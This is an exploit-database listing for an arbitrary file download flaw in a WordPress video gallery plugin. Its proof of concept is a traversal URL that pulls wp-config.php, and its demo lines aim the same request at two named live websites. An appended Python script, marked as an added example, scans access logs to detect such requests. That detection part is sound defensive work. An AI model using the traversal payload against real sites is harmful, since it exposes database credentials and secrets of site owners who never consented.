WordPress Video Gallery Arbitrary File Download Vulnerability

2015-01-29T00:00:00
ID 1337DAY-ID-23207
Type zdt
Reporter X-Line
Modified 2015-01-29T00:00:00

Description

Exploit for the PHP platform in the web applications category

######################
# Exploit Title: Wordpress Plugins - Wordpress Video Gallery Arbitrary File Download Vulnerability
# Date: 17/01/2015
# Exploit Author: X-Line ( Empire North ) From  Tetouan
# Vendor Homepage: Dork : www.hdflvplayer.net
# Software Link: http://www.hdflvplayer.net/
# Tested on: Win8, Linux
# Google Dork: use your Braain ;)
######################
   
# Proof of Concept
 
http://[target]/wp-content/plugins/contus-video-gallery/hdflvplayer/download.php?f=../../../../wp-config.php
  
 
#Demo
 
http://www.gerardbattenmep.com/wp-content/plugins/contus-video-gallery/hdflvplayer/download.php?f=../../../../wp-config.php
http://kleenradio.com/wp-content/plugins/contus-video-gallery/hdflvplayer/download.php?f=../../../../wp-config.php
 
 
Greetz to : HeroHero & all Membre Herochima .. Nik nik nik ... 7alwa 7alwa 7alwa.. stk stk stk ...3etina niko a7ambak :( [Klipcha]

#  0day.today [2018-02-19]  #
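
A defender-side check for the request pattern in the proof of concept above, as an added example that is not part of the original advisory or the plugin's code: it scans web server access logs for requests to the plugin's download.php whose f parameter contains directory traversal, including percent-encoded and double-encoded forms. The access log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Handler path taken from the proof of concept above.
HANDLER = "/wp-content/plugins/contus-video-gallery/hdflvplayer/download.php"
# Assumption: common/combined access log format with a quoted request line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE = [
    f'203.0.113.7 - - [29/Jan/2015:10:00:01 +0000] "GET {HANDLER}?f=../../../../wp-config.php HTTP/1.1" 200 3120',
    f'203.0.113.7 - - [29/Jan/2015:10:00:05 +0000] "GET {HANDLER}?f=%252e%252e%252f%252e%252e%252fwp-config.php HTTP/1.1" 200 3120',
    f'198.51.100.4 - - [29/Jan/2015:10:02:11 +0000] "GET {HANDLER}?f=intro.mp4 HTTP/1.1" 200 88211',
    '198.51.100.9 - - [29/Jan/2015:10:03:40 +0000] "GET /index.php?f=../x HTTP/1.1" 404 0',
]

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded ../ sequences are exposed."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(value):
    """True if an f= value climbs out of its directory or is an absolute path."""
    norm = fully_decode(value).replace("\\", "/")
    return (".." in norm.split("/") or norm.startswith("/")
            or re.match(r"[A-Za-z]:", norm) is not None)

def scan(lines):
    """Return (client_ip, http_status, decoded_f) for each suspicious request."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        try:
            url = urlsplit(m.group(1))
        except ValueError:  # malformed request target, nothing to inspect
            continue
        if not url.path.lower().endswith(HANDLER):
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get("f", []):
            if is_traversal(value):
                hits.append((line.split()[0], int(m.group(2)), fully_decode(value)))
    return hits
```

A hit logged with status 200 means the file was probably served; for wp-config.php that exposes the database credentials and authentication salts, which should then be rotated.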